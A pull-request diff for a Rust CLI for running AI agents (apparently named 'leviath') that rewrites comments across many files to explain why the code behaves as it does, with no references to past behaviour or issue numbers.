### PR TITLE
chore: comments say why, not what they used to be

### DIFF
--- a/crates/leviath-agent-client/src/mapping.rs
+++ b/crates/leviath-agent-client/src/mapping.rs
@@ -66,8 +66,8 @@ pub fn flatten_prompt(blocks: &[ContentBlock]) -> String {
 /// block; its content runs until the next `---region:...---` marker, an
 /// `---end-regions---` line, or the end of the text. Any text before the first
 /// marker becomes the `task` region. With **no** markers at all, the whole text
-/// is returned as `{ "task": text }` - the exact pre-feature behavior, so hosts
-/// that don't use markers are unaffected.
+/// is returned as `{ "task": text }`, so a host that sends a plain prompt gets
+/// a plain task.
 ///
 /// Region bodies are trimmed; empty blocks are dropped. Pure - no I/O.
 pub fn parse_region_markers(text: &str) -> std::collections::HashMap<String, String> {
@@ -120,7 +120,7 @@ pub fn parse_region_markers(text: &str) -> std::collections::HashMap<String, Str
     }
 
     if !saw_marker {
-        // No markers: preserve exact legacy behavior (whole text → task).
+        // No markers anywhere: the whole text is the task.
         let mut out = HashMap::new();
         let trimmed = text.trim();
         if !trimmed.is_empty() {

--- a/crates/leviath-cli/src/bundled.rs
+++ b/crates/leviath-cli/src/bundled.rs
@@ -1185,11 +1185,11 @@ mod tests {
     /// Every stage resolves to the first model it lists that anything serves.
     ///
     /// A blueprint's `models` is a preference order. The host picks a route
-    /// within that order; it does not get to pick a different preference. #578
-    /// was exactly that failure: entries matched as whole `provider/model`
-    /// pairs, so `default_provider` chose among routes and whatever model its
-    /// route happened to name came back. `polish` asked for
-    /// `gemini-3.1-pro-preview` and ran `claude-sonnet-5`.
+    /// within that order; it does not get to pick a different preference. The
+    /// failure this rules out: matching entries as whole `provider/model`
+    /// pairs, so `default_provider` chooses among routes and whatever model
+    /// its route names comes back - `polish` asking for
+    /// `gemini-3.1-pro-preview` and running `claude-sonnet-5`.
     ///
     /// Run over every bundled agent, because the blueprints are what ship.
     #[test]
@@ -1265,9 +1265,9 @@ mod tests {
                     .next()
                     .unwrap_or(&reachable[0].model);
 
-                // A real default provider, because the reordering #578 lived in
-                // only runs when one is set and registered. Passing the empty
-                // default skips that block entirely and tests nothing.
+                // A real default provider, because the reordering only runs
+                // when one is set and registered. Passing the empty default
+                // skips that block entirely and tests nothing.
                 let defaults = leviath_runtime::pipeline::ModelDefaults {
                     provider: "openrouter".to_string(),
                     ..Default::default()
@@ -1294,10 +1294,10 @@ mod tests {
     /// A provider claims the models it serves, and not the rest.
     ///
     /// `serves_model` decides which provider a bare model name resolves to, so a
-    /// provider that over-claims wins models it cannot run. That is the same
-    /// failure #578 was about, arriving from the other direction: there the host
-    /// picked a route and got the wrong model, here a provider claims a model it
-    /// has never heard of.
+    /// provider that over-claims wins models it cannot run. It is the stage
+    /// test above from the other direction: there the host picks a route and
+    /// gets the wrong model, here a provider claims a model it has never heard
+    /// of.
     #[test]
     fn a_provider_does_not_claim_models_from_other_vendors() {
         let providers = setup_providers();
@@ -1388,9 +1388,9 @@ mod tests {
         // machine configured with exactly one of them, every stage still runs.
         //
         // Asked of the providers themselves rather than of the spelling. A
-        // blueprint names models and leaves routing to the machine, so "does
-        // this stage name a provider" no longer answers the question - "does
-        // this provider serve anything this stage named" does.
+        // blueprint names models and leaves routing to the machine, so the
+        // question is not "does this stage name a provider" but "does this
+        // provider serve anything this stage named".
         //
         // Discovered from BUNDLED_AGENTS rather than enumerated, so a new
         // blueprint is covered the day it lands.

--- a/crates/leviath-cli/src/commands/add.rs
+++ b/crates/leviath-cli/src/commands/add.rs
@@ -993,9 +993,9 @@ mod tests {
     }
 
     /// A manifest whose name walks out of the agents directory must not be
-    /// installed, and must not touch what it pointed at: the old code joined
-    /// the name onto the agents directory and, finding the target existed,
-    /// removed it before copying.
+    /// installed, and must not touch what it points at: joining the name onto
+    /// the agents directory and clearing the target before copying would
+    /// delete whatever the walk landed on.
     #[test]
     fn install_from_dir_refuses_a_name_that_escapes_the_agents_dir() {
         let root = tempfile::tempdir().unwrap();
@@ -1025,7 +1025,7 @@ mod tests {
 
     /// The name comes from the `[agent]` table, not from the first line that
     /// happens to start with `name`: a `names = [..]` key elsewhere in the
-    /// manifest used to be read as the agent's name.
+    /// manifest is not the agent's name.
     #[test]
     fn install_from_dir_reads_the_agent_table_not_the_first_name_line() {
         let root = tempfile::tempdir().unwrap();

--- a/crates/leviath-cli/src/commands/agent_client/mod.rs
+++ b/crates/leviath-cli/src/commands/agent_client/mod.rs
@@ -440,9 +440,9 @@ impl Server {
                         // is gone. Flush what the run wrote so far, then follow
                         // the run onto the new daemon - which reloads it - by
                         // subscribing again; the control client waits a restart
-                        // out. This used to end the turn on the spot, so a
-                        // `lev daemon restart` mid-answer handed the editor a
-                        // truncated reply while the run finished unwatched.
+                        // out. Ending the turn here instead would hand the
+                        // editor a truncated reply on a `lev daemon restart`
+                        // mid-answer, with the run finishing unwatched.
                         // The turn ends only when no daemon comes back, or when
                         // one keeps coming back and dropping the stream without
                         // a single event - a daemon in that state is not going

--- a/crates/leviath-cli/src/commands/agent_client/tests.rs
+++ b/crates/leviath-cli/src/commands/agent_client/tests.rs
@@ -567,9 +567,9 @@ async fn session_new_opens_a_session_and_returns_its_id() {
 
 #[tokio::test]
 async fn empty_cwd_defaults_to_the_launch_directory() {
-    // Regression for #80: a `session/new` with an empty `cwd` must give the
-    // spawned agent the directory `lev agent-client` was launched from (the
-    // harness's default), not an empty workdir that runs in the daemon's dir.
+    // A `session/new` with an empty `cwd` must give the spawned agent the
+    // directory `lev agent-client` was launched from (the harness's default),
+    // not an empty workdir that runs in the daemon's dir.
     let captured = Arc::new(std::sync::Mutex::new(None));
     let cap = captured.clone();
     let daemon = ScriptedDaemon::new(vec![completed("complete")], move |req| match req {

--- a/crates/leviath-cli/src/commands/dashboard/agents/panel_tests.rs
+++ b/crates/leviath-cli/src/commands/dashboard/agents/panel_tests.rs
@@ -1881,9 +1881,10 @@ fn a_stage_that_inherits_lists_the_shared_regions_and_a_table_seed_reads_as_such
 }
 
 /// The file a prompt is handed over in is private and its name is not
-/// knowable in advance: it used to be `<temp>/leviath-dash-prompts/<stage>-
-/// system.md`, a path another local user could create first and point
-/// wherever they liked, on a directory this process did not own.
+/// knowable in advance. A fixed name like
+/// `<temp>/leviath-dash-prompts/<stage>-system.md` sits on a directory this
+/// process does not own, so another local user can create it first and point
+/// it wherever they like.
 #[test]
 fn handoff_files_are_private_and_unpredictable() {
     let (mut dash, root) = dashboard("prompts_private_handoff");

--- a/crates/leviath-cli/src/commands/dashboard/agents/tests.rs
+++ b/crates/leviath-cli/src/commands/dashboard/agents/tests.rs
@@ -399,7 +399,7 @@ fn the_chooser_starts_simple_or_clones_and_checks_the_name() {
     assert!(text(&mut dash).contains("Letters, digits"));
     dash.handle_key(key(KeyCode::Enter));
     assert!(dash.agents().chooser.is_some());
-    // The row no longer changes the name once typed.
+    // Moving the row does not overwrite a name once typed.
     dash.handle_key(key(KeyCode::Down));
     assert_eq!(
         dash.agents().chooser.as_ref().unwrap().name.value(),
@@ -434,7 +434,7 @@ fn the_chooser_starts_simple_or_clones_and_checks_the_name() {
     assert_eq!(editor.name, "my-coder");
     assert!(editor.doc.has_stage("discover"));
     // Save: the clone lands under the agents dir with the coder's scripts
-    // (it has none; the reviewer neither), and is no longer new.
+    // (it has none; the reviewer neither), and stops counting as new.
     dash.handle_key(ctrl('s'));
     assert!(
         root.join("agents")
@@ -698,7 +698,7 @@ fn the_canvas_adds_connects_selects_and_deletes_with_undo_behind_it() {
     );
     dash.handle_key(ctrl('z'));
     assert!(text(&mut dash).contains("Nothing to undo"));
-    // `u` is no longer a key: it is left for the canvas, which ignores it.
+    // `u` is not an undo key: it is left for the canvas, which ignores it.
     dash.handle_key(key(KeyCode::Char('u')));
     assert!(!text(&mut dash).contains("Nothing to undo"));
     // The rest of the canvas keys: rotate, fit, zoom, and a key nobody has.

--- a/crates/leviath-cli/src/commands/dashboard/context_tree.rs
+++ b/crates/leviath-cli/src/commands/dashboard/context_tree.rs
@@ -108,7 +108,7 @@ fn name_width(snap: &ContextSnapshot) -> usize {
 /// beside it.
 ///
 /// The cut is what makes this a cell rather than a `{:<width$}`, which pads but
-/// never truncates - so a name or a kind wider than its column used to shunt
+/// never truncates - so a name or a kind wider than its column would shunt
 /// that one row's remaining columns right of every other row's.
 ///
 /// Counted in characters, which is also what the padding counts, so the two
@@ -360,10 +360,10 @@ mod tests {
             .collect()
     }
 
-    /// A name too long for its column used to push that row's kind and token
+    /// A name too long for its column must not push that row's kind and token
     /// bar right of every other row's. `stage_instructions` is eighteen
-    /// characters and is in the layout every bundled agent uses, so this was
-    /// on screen rather than hypothetical.
+    /// characters and is in the layout every bundled agent uses, so this is on
+    /// screen rather than hypothetical.
     #[test]
     fn a_long_region_name_does_not_push_its_own_row_out_of_line() {
         let mut s = snap();

--- a/crates/leviath-cli/src/commands/dashboard/detail_band.rs
+++ b/crates/leviath-cli/src/commands/dashboard/detail_band.rs
@@ -1,8 +1,8 @@
 //! The detail view's graph band: the run's path through its blueprint, drawn
-//! in the rows the flat tab strip used to have by the same canvas as the
+//! in the rows the flat tab strip otherwise takes, by the same canvas as the
 //! explorer.
 //!
-//! The strip said "3 of 7" and which stage was selected. The band says where
+//! The strip says "3 of 7" and which stage is selected. The band says where
 //! the run has actually been: one box per stage *visit*, in order, snaking
 //! across rows so it stays compact and grows a row at a time while the run is
 //! still going (see [`crate::tui::flowgraph::path`]). Three passes through

--- a/crates/leviath-cli/src/commands/dashboard/explorer.rs
+++ b/crates/leviath-cli/src/commands/dashboard/explorer.rs
@@ -884,8 +884,8 @@ condition = "llm_choice"
             inside.1,
         ));
         // A kind the canvas does not route (the wheel sideways) leaves the
-        // capture alone. Plain motion no longer reaches here at all: it is
-        // taken above, to light the long-form editor's toolbar.
+        // capture alone. Plain motion does not reach here at all: it is taken
+        // above, to light the long-form editor's toolbar.
         dash.handle_mouse(mouse(MouseEventKind::ScrollLeft, inside.0, inside.1));
         assert_eq!(dash.mouse_capture, None);
 

--- a/crates/leviath-cli/src/commands/dashboard/helpers.rs
+++ b/crates/leviath-cli/src/commands/dashboard/helpers.rs
@@ -38,8 +38,8 @@ pub(super) fn relative_time(ts: i64) -> String {
 /// be cut. The ellipsis is part of the budget, so the result never draws wider
 /// than `max`.
 ///
-/// Measured in display columns, not bytes: a run title full of em dashes or
-/// emoji used to be cut at a third of the room it was given, and a wide
+/// Measured in display columns, not bytes: counting bytes cuts a title full of
+/// long dashes or emoji at a third of the room it was given, and a wide
 /// character counts for the two cells it occupies.
 pub(super) fn truncate(s: &str, max: usize) -> String {
     let s = s.trim();

--- a/crates/leviath-cli/src/commands/dashboard/history.rs
+++ b/crates/leviath-cli/src/commands/dashboard/history.rs
@@ -1,7 +1,7 @@
 //! Cached run history: the archived context points and the stage-visit
 //! timeline derived from them.
 //!
-//! The `,`/`.` history keys used to re-read and re-replay the entire
+//! The `,`/`.` history keys would otherwise re-read and re-replay the entire
 //! `run.lvr` archive on every keypress; the stage explorer needs the same
 //! data plus real visit counts (stages.json holds one record per stage,
 //! rewritten in place, so revisits are invisible there). This module loads

--- a/crates/leviath-cli/src/commands/dashboard/input.rs
+++ b/crates/leviath-cli/src/commands/dashboard/input.rs
@@ -596,8 +596,8 @@ impl Dashboard {
             // takes the shifted one.)
             KeyCode::Char('t') if self.band_shown() => self.toggle_band_mode(),
             KeyCode::Char('R') if self.band_shown() => self.reset_band_layout(),
-            // Home/End are the documented jumps; b/e stay as the historical
-            // aliases. (`detail_scroll` counts up from the bottom, so "top of
+            // Home/End are the documented jumps; b/e are kept as aliases.
+            // (`detail_scroll` counts up from the bottom, so "top of
             // the document" is the maximum offset.)
             KeyCode::Char('b') | KeyCode::Home => {
                 self.detail_scroll = usize::MAX;
@@ -2260,8 +2260,8 @@ mod tests {
         );
     }
 
-    /// `c` no longer cancels from the list (it was an unconfirmed kill by
-    /// another name); it is simply unbound there.
+    /// `c` is unbound in the list: cancelling straight from a row is an
+    /// unconfirmed kill by another name.
     #[test]
     fn c_in_the_main_list_does_nothing() {
         let (cmd_tx, mut cmd_rx) = mpsc::unbounded_channel();

--- a/crates/leviath-cli/src/commands/dashboard/mod.rs
+++ b/crates/leviath-cli/src/commands/dashboard/mod.rs
@@ -51,21 +51,20 @@ use types::DaemonCommand;
 
 /// How often the poller asks the daemon what it is holding.
 ///
-/// Slower than the 100ms draw tick on purpose. Two socket round trips per
-/// frame was never a rate anything needed - a run's status changes on the
-/// order of seconds - and the old loop only ran at that rate because it was
-/// doing the asking inline.
+/// Slower than the 100ms draw tick on purpose: two socket round trips per
+/// frame is not a rate anything needs, since a run's status changes on the
+/// order of seconds.
 const DAEMON_POLL_INTERVAL: Duration = Duration::from_millis(300);
 
 /// Background task that asks the daemon what it is holding, and publishes each
 /// round for the draw loop to pick up.
 ///
-/// This exists so the dashboard never waits on the socket. The two questions -
-/// the open interactions and the live run ids - used to be `await`ed inside the
-/// tick, between advancing the frame and drawing it, so a daemon that was busy,
-/// wedged, or part-way through a restart stopped the whole UI: no redraw, no
-/// keys, nothing, until it answered. A control request's deadline is thirty
-/// seconds and there were two per tick.
+/// This exists so the dashboard never waits on the socket. Awaiting the two
+/// questions - the open interactions and the live run ids - inside the tick,
+/// between advancing the frame and drawing it, lets a daemon that is busy,
+/// wedged, or part-way through a restart stop the whole UI: no redraw, no
+/// keys, nothing, until it answers. A control request's deadline is thirty
+/// seconds, and there are two questions per tick.
 ///
 /// Every round is sent whether or not the daemon answered, because "it did not
 /// say" is itself information the run list needs: a `None` run set means the

--- a/crates/leviath-cli/src/commands/dashboard/new_run.rs
+++ b/crates/leviath-cli/src/commands/dashboard/new_run.rs
@@ -399,8 +399,8 @@ impl Dashboard {
     /// Ctrl+Enter reaches the program only under the kitty keyboard protocol;
     /// a terminal without it sends Ctrl+Enter as a plain Enter, which is a
     /// newline here. That is what the Start button under the editor is for.
-    /// The response box in the detail view works the same way since #708,
-    /// with a Send button in place of Start.
+    /// The response box in the detail view works the same way, with a Send
+    /// button in place of Start.
     fn handle_new_run_task_key(&mut self, key: crossterm::event::KeyEvent) {
         use crossterm::event::{KeyCode, KeyModifiers};
         match key.code {
@@ -1596,10 +1596,9 @@ mod tests {
     }
 
     /// Every switch to ON asks. Turning unattended off and on again is the
-    /// same decision as the first time, and a dialog that showed up once and
-    /// then never again read as the setting being broken rather than
-    /// remembered. Space on the dialog (which used to tick a "don't ask again"
-    /// box) changes nothing now.
+    /// same decision as the first time, and a dialog that shows up once and
+    /// then never again reads as the setting being broken rather than
+    /// remembered. Space on the dialog changes nothing.
     #[test]
     fn every_switch_to_on_asks_even_after_the_box_was_ticked() {
         let mut dash = make_test_dashboard();

--- a/crates/leviath-cli/src/commands/dashboard/render/content.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/content.rs
@@ -805,7 +805,7 @@ impl Dashboard {
                     if tail.is_empty() {
                         // Nothing in the stage's output.log. If this stage
                         // submitted the run's final answer, show that instead
-                        // of a permanent "No output yet" (issue #410).
+                        // of a permanent "No output yet".
                         match self.final_output_for_selected_stage(agent) {
                             Some(answer) => {
                                 showing_final_output = true;
@@ -1042,10 +1042,10 @@ mod tests {
                 },
                 runstate::RegionSnapshot {
                     name: "history".to_string(),
-                    // The word a snapshot writes now. The older `sliding` has
-                    // to draw the same letter, which is what
+                    // The word a snapshot writes. The legacy `sliding` spelling
+                    // has to draw the same letter, which
                     // `render_context_bar_regions_string_with_many_region_types`
-                    // covers with a snapshot spelled the old way.
+                    // covers.
                     kind: "sliding_window".to_string(),
                     current_tokens: 3000,
                     max_tokens: 4000,
@@ -1738,7 +1738,7 @@ mod tests {
             |_d| {
                 let run_id = "test-content-final-output-match";
                 // A `mode = "output"` stage writes nothing to output.log; its
-                // answer lives only in the final_output sidecar (issue #410).
+                // answer lives only in the final_output sidecar.
                 let mut agent = setup_run_state_agent_with_final_output(
                     run_id,
                     "present",

--- a/crates/leviath-cli/src/commands/dashboard/render/mcp.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/mcp.rs
@@ -117,8 +117,8 @@ impl Dashboard {
 
     fn draw_mcp_help_bar(&self, frame: &mut Frame, area: Rect) {
         let hint = Paragraph::new(Line::from(Span::styled(
-            // `q` quits the whole dashboard here, as it does on the run list.
-            // This line used to say "q back", which is what Esc does.
+            // `q` quits the whole dashboard here, as it does on the run list,
+            // so the bar must not label it "back" - that is Esc.
             " ↑↓ select · a add · d delete · l login · t test · r refresh · esc back · q quit ",
             Style::default().fg(C_DIM),
         )));

--- a/crates/leviath-cli/src/commands/dashboard/render/overlays.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/overlays.rs
@@ -922,8 +922,8 @@ mod tests {
         assert_eq!(dash.new_run_filter, "?");
     }
 
-    /// Since #708 the unattended warning has no "don't ask again" box, so
-    /// the Questions section must not offer a key for it.
+    /// The unattended warning has no "don't ask again" box, so the Questions
+    /// section must not offer a key for it.
     #[test]
     fn the_questions_help_offers_no_dont_ask_again_box() {
         let backend = TestBackend::new(120, 60);

--- a/crates/leviath-cli/src/commands/dashboard/render/stages.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/stages.rs
@@ -22,8 +22,8 @@ const STAGE_TAB_OVERHEAD: usize = 16;
 
 /// How many columns each stage name may take on a strip whose inside is
 /// `inner_width` wide and holds `tabs` tabs. Wide strips show a long name
-/// whole; a crowded one falls back to the old fixed width, which the strip
-/// clips the same way it always did.
+/// whole; a crowded one falls back to `STAGE_LABEL_MIN_W`, which the strip
+/// then clips.
 fn stage_label_width(inner_width: u16, tabs: usize) -> usize {
     let per_tab = usize::from(inner_width) / tabs.max(1);
     per_tab
@@ -595,12 +595,12 @@ mod tests {
     }
 
     /// A wide strip shows a long stage name whole; a crowded one falls back
-    /// to the old fixed width rather than to nothing.
+    /// to the minimum width rather than to nothing.
     #[test]
     fn a_stage_name_gets_the_room_the_strip_has() {
         // 118 inside columns across three tabs: 39 each, 23 for the name.
         assert_eq!(stage_label_width(118, 3), 23);
-        // Never below the width the strip always used, never above the cap.
+        // Never below the minimum, never above the cap.
         assert_eq!(stage_label_width(30, 6), STAGE_LABEL_MIN_W);
         assert_eq!(stage_label_width(0, 0), STAGE_LABEL_MIN_W);
         assert_eq!(stage_label_width(400, 1), STAGE_LABEL_MAX_W);

--- a/crates/leviath-cli/src/commands/dashboard/render/table.rs
+++ b/crates/leviath-cli/src/commands/dashboard/render/table.rs
@@ -436,7 +436,7 @@ impl Dashboard {
                     Span::styled("[Esc]", Style::default().add_modifier(Modifier::BOLD)),
                     Span::raw(" back to the prompt"),
                 ]),
-                // The response box since #708: Enter breaks the line and
+                // The response box: Enter breaks the line and
                 // Ctrl+Enter sends, with the Send button for a terminal
                 // that cannot tell the two apart. An in-place edit is the
                 // same box with a Save button, so it takes the same bar.
@@ -1215,7 +1215,7 @@ mod tests {
             })
             .unwrap();
         let buf = rendered_buffer(&terminal);
-        // Enter is a newline in the box since #708; the bar must not say it sends.
+        // Enter is a newline in the box; the bar must not say it sends.
         assert!(buf.contains("[^Enter] send"), "{buf}");
         assert!(buf.contains("[Enter] newline"), "{buf}");
         assert!(buf.contains("[Tab] Send button"), "{buf}");
@@ -1850,9 +1850,9 @@ mod tests {
         assert!(wide.contains("breaker opened"), "{wide}");
     }
 
-    /// An in-place edit is the response box with a Save button, and takes
-    /// the same keys; the bar used to give it the choice list's "[Enter]
-    /// confirm" while Enter broke the line.
+    /// An in-place edit is the response box with a Save button, and takes the
+    /// same keys: the bar must not offer it the choice list's "[Enter]
+    /// confirm" while Enter breaks the line.
     #[test]
     fn draw_help_bar_input_mode_edit_text() {
         let backend = TestBackend::new(120, 2);

--- a/crates/leviath-cli/src/commands/dashboard/state.rs
+++ b/crates/leviath-cli/src/commands/dashboard/state.rs
@@ -87,8 +87,8 @@ pub(crate) struct Dashboard {
     /// Cached archive of the selected run (points + visit timeline).
     pub(super) history: Option<super::history::RunHistoryCache>,
     /// Loads a run's archived points. Injected (mirroring `clock`/`yank_fn`)
-    /// so tests can count loads and prove `,`/`.` no longer re-read the
-    /// archive per keypress.
+    /// so tests can count loads and pin that `,`/`.` read the archive once
+    /// per run, not once per keypress.
     pub(super) history_loader: fn(&str) -> Vec<leviath_core::run_archive::RunPoint>,
     /// Scroll offset for detail view content: 0 = bottom (auto-scroll), >0 = scrolled up
     pub(super) detail_scroll: usize,
@@ -105,11 +105,11 @@ pub(crate) struct Dashboard {
     /// True after the first sync completes; suppresses startup toasts for pre-existing state.
     pub(super) initial_sync_done: bool,
     // ── Poll caches ───────────────────────────────────────────────────────────
-    // The sync tick runs at 10Hz and used to re-read and re-parse every run's
-    // meta.json, stages.json, and whole context.json on every tick - ~100 MB/s
-    // of allocate-parse-free with 50 runs on disk, for files that change at
-    // most once per persist tick. These stat-gated caches reduce the steady
-    // state to stat calls.
+    // The sync tick runs at 10Hz across every run on disk, and meta.json,
+    // stages.json, and context.json change at most once per persist tick.
+    // Re-reading and re-parsing them each tick costs ~100 MB/s of
+    // allocate-parse-free with 50 runs on disk; these stat-gated caches hold
+    // the steady state to stat calls.
     pub(super) meta_cache: runstate::StatCache<runstate::RunMeta>,
     pub(super) stages_cache: runstate::StatCache<Vec<leviath_core::run_meta::StageRecord>>,
     pub(super) context_cache: runstate::StatCache<runstate::ContextSnapshot>,
@@ -798,15 +798,12 @@ impl Dashboard {
         if matches!(agent.status, AgentDisplayStatus::Cancelled) {
             return false;
         }
-        // Check if there's actually a prompt to respond to
         if agent.waiting_prompt.is_none() && agent.pending_request.is_none() {
             return false;
         }
         // Gate on the selected stage matching the stage currently requiring input.
-        // Use pending_request.stage_name if available, otherwise fall back to current stage_index.
         let input_stage_idx = if let Some(req) = &agent.pending_request {
             if !req.stage_name.is_empty() {
-                // Find stage by name
                 agent
                     .stages
                     .iter()
@@ -904,7 +901,7 @@ impl Dashboard {
     /// Drop folds naming runs that no longer exist, and write the store when
     /// that changed anything.
     ///
-    /// ⚠️ Skipped while the run list is empty. Folds outlive the process now,
+    /// ⚠️ Skipped while the run list is empty. Folds outlive the process,
     /// and "no runs" is also what the very first tick sees, and what a runs
     /// directory that could not be read for a moment sees - pruning against
     /// that would delete every remembered fold on startup. An empty list has
@@ -1088,8 +1085,8 @@ mod tests {
             .collect();
         assert_eq!(before, ["run-new", "run-old"]);
 
-        // The newest run finishes; in the old bucket sort it would leap below
-        // the still-active one. Here it stays exactly where it was.
+        // The newest run finishes. Its row stays exactly where it was rather
+        // than sorting under the still-active one.
         dash.agents[1].status = AgentDisplayStatus::Complete;
         dash.update_display_indices();
         let after: Vec<String> = dash
@@ -3017,10 +3014,10 @@ mod tests {
     /// instead of reverting to ACTIVE) and when the dashboard opens on a run
     /// that was already paused.
     ///
-    /// The second case is the one that used to be wrong: the dashboard rebuilt
-    /// the timer from transitions it had watched, so a pause it never saw start,
-    /// because it was closed or because the run was paused before it opened,
-    /// counted as work.
+    /// The second case is the one with no local evidence: the timer comes from
+    /// the run's own clock, not from transitions the dashboard watched, so a
+    /// pause that began before it opened still reads as paused rather than as
+    /// work.
     #[test]
     fn sync_from_run_state_paused_run_shows_paused_with_a_stopped_timer() {
         crate::runstate::with_isolated_runs_dir("sync-paused-run", |_d| {
@@ -3508,8 +3505,8 @@ mod tests {
 
     /// Leaving a wait does not add the wait to the run's time.
     ///
-    /// The dashboard no longer reconstructs any of this: the run's own clock is
-    /// what it reads, so a wait it never observed costs nothing either.
+    /// The dashboard reconstructs none of this: it reads the run's own clock,
+    /// so a wait it never observed costs nothing either.
     #[test]
     fn sync_from_run_state_leaving_a_wait_does_not_bill_the_wait() {
         crate::runstate::with_isolated_runs_dir(

--- a/crates/leviath-cli/src/commands/dashboard/types.rs
+++ b/crates/leviath-cli/src/commands/dashboard/types.rs
@@ -361,7 +361,7 @@ pub(crate) struct DashboardAgent {
     pub last_answered_request_id: Option<String>,
     /// Live context window snapshot from context.json (background workers only)
     /// Shared, not owned: the live snapshot comes out of the sync tick's
-    /// stat-gated cache, and cloning a full context window per tick was the
+    /// stat-gated cache, and cloning a full context window per tick is the
     /// churn that cache exists to remove.
     pub context_snapshot: Option<std::sync::Arc<runstate::ContextSnapshot>>,
     /// Per-stage records from stages.json
@@ -385,10 +385,10 @@ pub(crate) struct DashboardAgent {
     /// it: time spent inferring, calling tools, or held for its own sub-agents,
     /// and none of the time it sat paused or waiting on a person.
     ///
-    /// Recomputed each sync from the run's own clock rather than reconstructed
-    /// here from transitions the dashboard happened to observe - it used to be
-    /// the latter, so a run that was already paused when the dashboard opened,
-    /// or paused while it was closed, counted the pause as work.
+    /// Recomputed each sync from the run's own clock, never reconstructed here
+    /// from transitions the dashboard happened to observe: a run already paused
+    /// when the dashboard opened, or paused while it was closed, would
+    /// otherwise count the pause as work.
     pub runtime_secs: u64,
     /// The moment the sync above read the clock at, for the per-stage clocks the
     /// stage tabs render. Capped at the run's `updated_at` when nothing is
@@ -447,15 +447,15 @@ pub(super) struct DaemonOutcome {
 /// runs the daemon is actually holding.
 ///
 /// Carried on a channel rather than fetched by the draw loop. Both answers
-/// come from control-socket round trips, and the loop used to `await` them
-/// between the tick and the draw - so a daemon that was busy, wedged, or
-/// restarting stopped the dashboard dead. The deadline on a control request is
-/// 30 seconds and there are two of them per tick, which is a very long time to
-/// look like a frozen terminal that ignores keys.
+/// come from control-socket round trips, and `await`ing them between the tick
+/// and the draw lets a daemon that is busy, wedged, or restarting stop the
+/// dashboard dead. The deadline on a control request is 30 seconds and there
+/// are two of them per tick, which is a very long time to look like a frozen
+/// terminal that ignores keys.
 ///
 /// Each field is `None` when that request did not come back, which the
 /// dashboard reads as "no answer this round" and leaves the corresponding
-/// state alone - the same best-effort reading the two polls always had.
+/// state alone - the best-effort reading both polls take.
 #[derive(Debug, Default, PartialEq)]
 pub(super) struct DaemonPoll {
     /// The daemon's open interactions, keyed by run id.

--- a/crates/leviath-cli/src/commands/doctor.rs
+++ b/crates/leviath-cli/src/commands/doctor.rs
@@ -20,8 +20,8 @@
 //!    and waited on, then deleted. This is the only check that exercises the
 //!    handoff, which is why it is worth the second billed call: checks 1-4
 //!    passing while this one fails is exactly the "credentials are fine, the
-//!    daemon is wedged" verdict that used to take a hand-built canary agent to
-//!    establish.
+//!    daemon is wedged" verdict, which nothing short of a real spawn
+//!    establishes.
 //!
 //! The daemon-touching I/O lives behind [`crate::dispatch::RiskyExecutors`], so
 //! the cores here are driven by unit tests against injected registries and a
@@ -378,8 +378,8 @@ fn config_check(config: &Config, registry: &ProviderRegistry) -> Check {
         config.default_provider, registered
     );
 
-    // "Which keys were ignored" was previously only answerable by catching the
-    // start-up warning as it scrolled past, and only if you were looking. A
+    // Without this, "which keys were ignored" is only answerable by catching
+    // the start-up warning as it scrolls past, and only if you are looking. A
     // note on an OK line rather than a failure, matching how the `resolve`
     // check reports a config that works but probably is not what was meant:
     // the rest of the file still applies, so this is not broken wiring.
@@ -491,16 +491,16 @@ fn resolve_check(
 ///
 /// This check resolves an empty `ModelConfig`, so `default_provider` really
 /// does lose here without a `default_model`: there is no blueprint entry to
-/// promote and no model to send. A real run is the opposite case, and the note
-/// used to describe only the first one - it said the default provider "is never
-/// chosen", which someone reasonably read as a statement about their runs.
+/// promote and no model to send. A real run is the opposite case, so the note
+/// must not say the default provider "is never chosen": that reads as a
+/// statement about the reader's runs.
 ///
 /// It is not. `resolve_stage_candidates` moves every registered candidate on
 /// the default provider to the front of the blueprint's list, so
 /// `default_provider = "openrouter"` sends every stage of every bundled
-/// blueprint to that blueprint's OpenRouter entry. A run that had been quietly
-/// executing on a fallback model for weeks looked, from here, like a config
-/// line that did nothing at all.
+/// blueprint to that blueprint's OpenRouter entry. Said the other way, a run
+/// quietly executing on a fallback model for weeks would look, from here, like
+/// a config line that did nothing at all.
 ///
 /// Not a failure: the resolution is legitimate and the run will work. It is
 /// only worth saying because it is not what the config appears to ask for.

--- a/crates/leviath-cli/src/commands/doctor/tests.rs
+++ b/crates/leviath-cli/src/commands/doctor/tests.rs
@@ -1121,8 +1121,7 @@ async fn run_checks_reports_a_config_that_will_not_parse() {
     assert_eq!(checks.len(), 1, "nothing runs after a broken config");
     assert_eq!(checks[0].name, "config");
     assert_eq!(checks[0].status, CheckStatus::Fail);
-    // Where in the file, and what a running daemon is doing meanwhile. The
-    // check used to be the loader's paragraph pasted into one column.
+    // Where in the file, and what a running daemon is doing meanwhile.
     let detail = &checks[0].detail;
     assert!(detail.contains("does not load"), "{detail}");
     assert!(detail.contains("line 1, column"), "{detail}");

--- a/crates/leviath-cli/src/commands/list.rs
+++ b/crates/leviath-cli/src/commands/list.rs
@@ -125,7 +125,6 @@ fn scan_directory_for_agents(dir: &Path, config: &Config, cwd: &Path) -> Vec<(Pa
         return agents;
     }
 
-    // Check if this directory itself has an agent.leviath
     let direct_manifest = dir.join(leviath_core::files::MANIFEST_FILENAME);
     if direct_manifest.exists()
         && let Some(info) = read_agent_info(&direct_manifest, config, cwd)
@@ -133,7 +132,6 @@ fn scan_directory_for_agents(dir: &Path, config: &Config, cwd: &Path) -> Vec<(Pa
         agents.push((dir.to_path_buf(), info));
     }
 
-    // Check subdirectories
     if let Ok(entries) = fs::read_dir(dir) {
         for entry in entries.flatten() {
             let path = entry.path();

--- a/crates/leviath-cli/src/commands/mcp.rs
+++ b/crates/leviath-cli/src/commands/mcp.rs
@@ -304,7 +304,7 @@ fn list_servers(list: ListArgs, env: &McpEnv) -> anyhow::Result<()> {
         .map(|s| ServerRow::describe(s, &store, env.now))
         .collect();
     // Also surface the global Rhai script tools (labeled `script`) so the listing
-    // covers every external tool provider, not just MCP servers (issue #97).
+    // covers every external tool provider, not just MCP servers.
     rows.extend(script_tool_rows(env.tools_dir.as_deref()));
 
     if list.json {

